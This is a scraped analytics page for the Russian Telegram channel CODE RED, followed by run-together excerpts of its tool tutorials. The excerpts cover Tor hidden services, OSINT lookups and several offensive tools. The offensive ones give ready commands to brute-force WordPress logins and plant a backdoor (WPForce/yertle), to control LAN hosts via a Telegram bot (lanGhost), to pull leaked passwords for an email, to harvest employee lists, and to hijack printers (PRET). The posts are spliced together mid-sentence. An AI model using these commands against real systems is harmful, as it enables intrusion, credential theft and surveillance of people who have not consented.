CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
Mostrar más📈 Análisis del canal de Telegram CODE RED
El canal CODE RED (@coderedcom) en el segmento lingüístico de Ruso es un actor destacado. Actualmente la comunidad reúne a 10 355 suscriptores, ocupando la posición 9 416 en la categoría Tecnologías y Aplicaciones y el puesto 61 181 en la región Rusia.
📊 Métricas de audiencia y dinámica
Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 10 355 suscriptores.
Según los últimos datos del 03 diciembre, 2024, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 0, y en las últimas 24 horas de 0, conservando un alto alcance.
- Estado de verificación: No verificado
- Tasa de interacción (ER): El promedio de interacción de la audiencia es 0%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
- Alcance de las publicaciones: Cada publicación recibe en promedio 0 visualizaciones. En el primer día suele acumular 0 visualizaciones.
- Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 0.
📝 Descripción y política de contenido
El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 04 diciembre, 2024), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.
wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip
Переходим в созданную директорию и запускаем сборку командами
◽️cd Shallot-master
◽️./configure
◽️make
Теперь установим непосредственно Tor и lighttpd
◽️apt-get install tor
◽️apt-get install lighttpd
Настройка
На данном этапе нужно сначала получить домен. Делается это командой
◽️./shallot ^codered
Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.
Далее запускаем Tor и lighttpd
◽️service tor start
◽️service lighttpd start
В файле /etc/tor/torrc нужно будет добавить такие строки
◽️HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080
В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку
◽️ExcludeNodes {ru}, {ua}, {be}
Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.
Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"
Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.
#kali #TORapt-get update –y && apt-get upgrade –y && apt-get dist-upgrade
Устанавливаем Python 3
◽️apt-get install python3 python3-pip
Скачиваем репозиторий
◽️git clone https://github.com/xdavidhu/lanGhost
Переходим в директорию и запускаем установщик
◽️cd LanGhost/
◽️./setup.py
Настройка
Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali127.0.0.1 с портом 9050 и типом Socks 5.
Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.git clone https://github.com/Moham3dRiahi/Th3inspector
Переходим в директорию с The Inspector, ставим права на установщик и запускаем его
◽️cd Th3inspector
◽️chmod +x install.sh && ./install.sh
Использование
Запускаем The Inspector командой
◽️perl Th3inspector.pl
Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.
#kali #OSINTpkg update upgrade -y
Далее установим git
◽️pkg install git
И скачаем само решение
◽️git clone https://github.com/MrAlpha786/termux-fingerprint-lock
Настройка
Переходим в директорию с инструментами и ставим права на исполняемый файл
◽️cd termux-fingerprint-lock
◽️chmod u+x setup
Далее запускаем его
◽️bash setup
В процессе выполнения программы попросит прислонить палец к сенсору. Готово. Теперь при последующем входе в Термукс, для появления данных на экране нужно будет сначала просканировать отпечаток.
#termux #безопасностьgit clone https://github.com/thewhiteh4t/pwnedOrNot.git
Далее устанавливаем необходимый модуль Python
◽️pip install cfscrape
Готово. Для Termux установим для начала Python и Git
◽️pkg install python2
◽️pkg install git
Далее необходимые модули
◽️pip2 install requests
◽️pip2 install cfscrape
И в итоге скачаем репозиторий с github
◽️git clone https://github.com/thewhiteh4t/pwnedOrNot.git
Использование
PwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️python pwnedornot.py
Это как для Kali, так и для Termux. Далее остается только ввести почту и ждать завершения процесса. Если поиск пройдет удачно, в терминале появится список паролей, которые могут быть связаны со сканируемым адресом.
#kali #хакингgit clone https://github.com/0x09AL/raven.git
Переходим в директорию и запускаем установщик
cd raven
sh setup.sh
Использование
Для вывода справки нужно вписать
python raven.py
Из представленной информации можно узнать, что минимальные данные, которые нужно знать о целевой компании - это её название и инициалы страны расположения.
То есть если мы хотим узнать о сотрудниках корпорации "Evil", которая находится в России, нужно будет вписать команду
python raven.py -c 'Evil' -s ru
После завершения работы скрипта в терминале появится список всех найденных сотрудников.git clone https://github.com/n00py/WPForce.git
Также потребуется установить Python.
Использование
Запускаем атаку на сайт командой
◽python wpforce.py -i <список логинов> -w <список паролей> -u <ссылка>
В случае успеха в консоль выведется логин и пароль. Далее на сайт можно подгрузить бекдор прописав
◽python yertle.py -u <логин> -p <пароль> -t <ссылка> --interactive
Готово, тестовый веб ресурс взломан, а мы закрепились в системе и можем управлять каталогами, БД и т.д.$ pkg install -y git
$ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig
$ chmod +x install.sh && ./install.sh
Использование
$ python3 main.py -u username
Так же, Osi.ig позволяет собрать статистику всех, и наиболее часто используемых хештегов. Дополнительно, можно проанализировать все метки местоположений, временные метки, подписи, комментарии и ссылки на изображения.
📌https://github.com/th3unkn0n/osi.ig
#OSINTpip install colorama pysnmp win_unicode_console
Далее потребуется установить несколько модулей
◽apt-get install ghostscript imagemagick
И скачать сам репозиторий с github
◽git clone https://github.com/RUB-NDS/PRET
Использование
Остается только вписать ip адрес на котором располагается целевой принтер и выбрать скриптовый язык
◽./pret.py 192.168.0.1 ps
Как итог установится сопряжение и атакующий сможет манипулировать устройством удаленно.